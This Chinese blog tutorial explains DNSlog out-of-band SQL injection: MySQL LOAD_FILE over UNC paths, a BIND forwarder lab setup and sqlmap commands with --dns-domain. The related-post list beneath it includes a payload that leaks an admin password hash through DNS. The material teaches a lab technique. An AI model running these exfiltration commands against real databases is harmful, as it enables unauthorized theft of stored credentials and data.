SQL注入之搭建dnslog

已于 2022-08-06 15:12:43 修改
阅读量615 收藏 3
点赞数
文章标签: sql 服务器 数据库
于 2022-08-06 15:07:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57686163/article/details/126173675
版权

文章目录

利用DNSlog进行注入

原理

  • 利用DNS解析记录,如果在指定dns服务器上尝试查询解析,那么就会留下查询内容。如果该dns是恶意用户搭建的dns服务器,那么就有权限查询记录内容,而记录内容刚好是由数据库内容构成,那么就达到了dns注入数据库的目的。
    在这里插入图片描述
  • 我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。

前置条件

secure_file_priv

  • 在MySQL中有个系统属性,secure_file_priv特性,通过该特性,mysql可以读写系统文件。当secure_file_privnull时,表示不允许读写文件,secure_file_priv指定文件夹时,表示mysql的读写只能发生在指定的文件夹,secure_file_priv没有设置时,则表示没有任何限制。
    在这里插入图片描述

  • 只有目标主机该变量为空时,我们才可以进行dnslog注入。如果需要在本地测试需要修改MySQL配置文件:my.ini
    在这里插入图片描述

  • MySQL函数:LOAD_FILE():读取一个文件并将其内容作为字符串返回,语法:load_file(文件的完整路径)
    在这里插入图片描述

  • 注意写路径时需要对\进行转义

远程共享文件

  • 如果目标主机为windows,且开启了445端口(用于访问远程的共享文件),mysql就可以通过UNC路径访问远程文件。格式为\\servername\sharename, servername 是服务器名,sharename 是共享资源的名称。
    在这里插入图片描述
  • 输入的severname通常是域名,会通过DNS解析,访问远程的DNS服务器就会留下解析日志

本地dnslog测试

  • 可以利用在线的dnslog平台,这里说一下如何在本地进行dnslog测试

环境
三台主机:一台win10主机、两台Linux虚拟机分别是centos8和kali
其中win10作为靶机,搭建sqllab靶场,并启动http服务,IP为192.168.204.1
centos8是win10的本地DNS服务器,IP为192.168.204.3
kali为攻击机,IP为192.168.204.105

centos8上搭建DNS服务

  • 提供DNS服务的软件叫bind,服务名是named。yum install bind
  • named的配置文件为etc/named.conf
options {
#	定义监听端口和地址,如果所有地址都监听,写any
	listen-on-port 53 {any; }; 
# 	定义数据目录,就是dns解析文件所在的目录
	directory "/var/named";
#   定义允许查询的之际,所有主机都可查询则为any
	allow-query {any; };
#	允许递归,本次实验中必须允许递归
	recursion yes;
};
# 区域定义,本次测试中可以没有
zone "xxxx.com" IN {
#	定义DNS服务器类型,主或从
	type master;
#	 定义区域数据文件,dns解析文件
	file "named.xxxx.co,"
};
# 配置转发器...

  • 当本地DNS服务器本地区域文件与缓存解析都失效,则根据本地DNS服务器的设置(是否设置转发器)进行查询。未设置转发器:本地DNS就把请求发至13台根DNS;如果设置了转发器,则将请求转发至设置的目标DNS服务器。

  • 转发器有全局转发器和局部转发器:全局转发器即对所有请求都为转发模式;局部转发器为对特定域名的解析请求为转发模式,其他的请求依然被发送给根服务器。

  • 这里需要将某个域名的解析请求全部转发给攻击机kail上

# 配置局部转发器,pw.top域的DNS请求全部转发给192.168.204.105,也就是kali
 zone "pw.top" IN {
    type forward;
    forwarders {192.168.204.105; };
    forward only;
 };
  • centos8启动DNS服务:systemctl start named

通过sqlmap进行dns注入

  • 首先测试kali是否可以收到请求,在kail中输入tcpdump -n port 53,在测试之前要将win10主机的DNS服务器指定为我们搭建的DNS服务器
    在这里插入图片描述

Tcpdum是Linux上强大的网络数据采集分析工具,
-n 不要将主机地址转换为名称。这可以用来避免DNS查找
port 53 指明分析53端口的数据包

  • win10打开cmd,pingxx.pw.top,xx为任意,centos遇到解析pw.top的请求就会转发给kali,如下图中有数据说明kali收到请求
    在这里插入图片描述

  • 在kali使用sqlmap进行注入,sqlmap -u "http://192.168.204.1/web-security/sqli-labs-master/Less-9/index.php?id=1" --technique=T --dns-domain "pw.top" --dbs
    在这里插入图片描述
    在这里插入图片描述

  • sqlmap使用–dns-domain参数时候会监听53端口,我们需要把我们获得数据所使用的域名的dns服务器配置到我们运行sqlmap的主机,就可以获得dns外带的数据。

公网dnslog搭建

  • sqlmap使用–dns-domain参数时候会监听53端口,监听请求,所以运行sqlmap的主机需要一个域名,因为配置dns服务器的时候也需要dns,所以我们需要两个域名。
  • 这里我有两个域名:telff.ccaornnroa.fun,还有一台vps,其IP为120.27.136.45
  • 配置我们的用于解析dns的nameserver的域名ns1.telff.cc,ns2.telff.cc指向我们运行sqlmap的主机ip
    在这里插入图片描述
  • 配置我们用于外带数据的域名aornnroa.fun的域名服务器为ns1.telff.ccns2.telff.cc
    在这里插入图片描述
  • 我们在vps上执行:sqlmap -u "http://xxxxxx/web-security/sqli-labs-master/Less-9/index.php?id=1" --dns-domain "aornnroa.fun" --dbs,就可以看到可以看到sqlmap执行返回的数据了,由于我的靶场没有布置在公网中,所以不演示最后的注入了。
傲然*
关注
sql 注入 Dnslog
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-12 375
通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1818
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
DNSlog平台的搭建
m0_51468027的博客
07-12 6031
从0到1搭建DNSlog平台,最后拓展了实现自动化运行DNSlog平台
SQL注入之利用DNSlog外带盲注回显
baynk的博客
03-31 6076
0x00 SQL盲注 当我们发现一个站点存在一个没有数据回显的注入点进行注入时,只能采取盲注,这种注入速度非常慢,需要一个一个字符猜解,而且很容易被网站BAN掉IP,虽然也可以使用代理IP池,但是还是需要一种快速有效的方法来获取数据。 此时我们就可以利用DNSlog来快速的获取数据,当然我们也可以在无回显的命令执行或者无回显的SSRF中利用。 0x01 DNSlog利用条件 DBMS中需要有可...
个人DNSLog平台搭建
ShangYaoPaiGu的博客
12-07 2345
搭建一个DNSLog平台需要准备以下:我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名 www.baidu.com 等的访问信息,类似日志文件。在服务器中输入 解压 进入目录后使用保证DNSLog平台可以在后台运行 创建新的,使用该命令后会自动进入该screen: 修改配置文件
SQL注入学习-Dnslog盲注
笑花大王
02-17 698
1.基础知识 1.DNS DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RF...
https防止注入_数据库DNSLog外带注入总结
weixin_39553600的博客
11-20 588
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入和DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求DNS解析、SMB服务等...
DnslogSQL注入中的实战
Hq_Dream的博客
01-20 3056
DnslogSQL注入中的实战 本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于DnslogSQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了这个攻击方式,或者只是用某个简单的payload做了简单的验证。 本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于DnslogSQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了...
sqlmap结合dnslog外带注入
newlife1441的博客
08-05 643
目录📓前言📓操作步骤1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置2.环境准备2.1Windows server2008 2.1.1搭建dns服务器2.2测试2.2.1设置靶机的网络的dns为server20082.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 2.2.3server2008中创建转发器2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况2.3开始sqlmap使用dnslog外带注入2.3...
一篇学会SQL注入 | 详解SQL注入(基础向,基础到每个参数)
weixin_47075747的博客
06-14 1182
**括号里面的查询被称之为子查询,在执行顺序中子查询先执行,然后再执行外面的 select **2) 的值是确定性的,假随机。
DNSLog-Platform-Golang:DNSLOG平台golang一键启动版
04-02
DNSLog-平台-Golang 相信DNSLog平台已经是安全从业者的标配。而公开的DNSLOG平台域名早已进入流量监控设备的规则库。同时也有重大问题值得关注。于是撸了(凑了)一个一键建造Dnslog平台的golang版本。可以使用其一键构造自己的Dnslog平台。由于是作者的第一个golang程序,难免会有一些小问题。不过他真的是一键! 部署 克隆或者下载本仓库到你的服务器上 不多说。 决定是否开放公网访问? 倒数第几行中的http.ListenAndServe("localhost:8000", nil) ,这样写的话只能通过本地主机进行访问,墙裂建议不要修改,而后通过中间件反向代理后对外开放,方便做访问控制,日志管理等。如果想直接对外开放的话可以修改为: http.ListenAndServe(":8000", nil) 域名准备 做好NS指向即可。不会检查请看后文 尝试运行 ~~
搭建dnslog、weblog平台
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
09-26 6310
文章目录a、前期准备b、搭建 渗透测试的时候,对于命令注入、反序列化等无回显漏洞,dnslog或者weblog是一个必不可少的平台。 不想搭建,可使用免费版:http://dnslog.cn/,不过有时效限制 下面是我的搭建过程,由于使用了别人做好的docker,所以总体搭建过程较为简单。 a、前期准备 一个公网服务器,一个域名(有的教程说要两个域名,一个足够了),我这里买的都是最低端的,一年总共也就一百来块,足够用了。 下面是我的域名配置: 配置A记录,子域名ns1,解析到 7.7.7.7(你买的公网i
DnslogSQL注入 & 四种数据库
3569
03-07 2842
https://www.anquanke.com/post/id/98096 mysql http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass) FROM test.test_user WHERE name='admin' LIMIT 1),'.mysql.nk4...
SQL注入——DNSLOG注入
qq_52263650的博客
11-17 781
SQL注入——DNSlog注入
SQL DNSlog注入详解
永远是少年
08-07 1360
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL DNSlog注入。 一、SQL DNSlog注入简介 二、SQL DNSlog注入实战
SQL注入DnsLog注入
qq_52310755的博客
03-22 2127
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
SQL注入DNS_log注入
weixin_47785246的博客
07-11 888
SQL注入DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。 文章目录SQL注入DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
自建DNSlog服务器
一枚小白的分享,不喜勿喷~
07-14 2178
在某些情况下,无法利用漏洞获得回显。但是,如果目标可以发送DNS请求,则可以通过DNS log方式将想获得的数据外带出来。网上公开提供dnslog服务有很多,比如dnslog.cn、知道创宇、三叶草等等,但是这些提供的域名是固定的,现在一些比较大型的企业已经把这些域名也加入到监控范围之中了。如果自建一个dnslog服务,就能很好的规避这种情况。
特别的sql注入方式-DNSlog注入--安鸾靶场练习 DNSlog注入学习
AAAAAAAAAAAA66的博客
01-05 2232
DNSlog注入 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 利用的场景 存在sql注入 无法获得回显 对目标网站可以发起请求 简单的来说就是可以利用 load_file() 函数,在存在注入的情况下将数据库中的信息带出我们的域名日志中(dnslog).详细的可以看下方链接 DNSLog在MySQL注入
sql注入外带dnslog
最新发布
09-11
很抱歉,我不能提供关于SQL注入外带DNS log的任何信息。 SQL注入是一种安全漏洞,允许攻击者通过在应用程序中插入恶意SQL代码来获取未经授权的访问权限或者对数据库进行操纵。这是一种严重的漏洞,应该被尽快修复。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值